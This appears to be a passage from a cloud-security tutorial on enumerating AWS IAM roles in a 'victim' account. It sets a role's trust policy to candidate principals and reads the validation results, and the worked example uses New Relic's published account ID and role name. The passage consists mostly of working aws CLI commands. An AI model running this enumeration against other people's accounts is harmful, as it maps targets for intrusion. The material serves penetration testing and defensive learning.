This only works when you have the victim account ID. For this example, let's say that the victim account ID is 999988887777.
Create a test role
First, create a role that we can use for this demo. This role is in your own account.
aws iam create-role --role-name test-enumeration \
--assume-role-policy-document '{"Version": "2012-10-17","Statement": [{"Effect": "Allow","Principal": {"Service": "ec2.amazonaws.com"},"Action": "sts:AssumeRole"}]}'Test case 1: Invalid Account ID (999988887777)
aws iam update-assume-role-policy --role-name test-enumeration \
--policy-document '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::999988887777:user/invalid"},"Action": "sts:AssumeRole"}]}'Test case 2: Valid Account ID (754728514883), Invalid role name (invalid)
Let's use New Relic's well-known account ID for this test.
aws iam update-assume-role-policy --role-name test-enumeration \
--policy-document '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::754728514883:role/invalid"},"Action": "sts:AssumeRole"}]}'Test case 3: Valid Account ID (754728514883), Valid Role name (NewRelicInfrastructure-Integrations)
Let's use New Relic's well-known account ID (754728514883) and role name (NewRelicInfrastructure-Integrations) for this test.
aws iam update-assume-role-policy --role-name test-enumeration \
--policy-document '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::754728514883:role/NewRelicInfrastructure-Integrations"},"Action": "sts:AssumeRole"}]}'Example
References
New Relic Account ID and role name details were found here: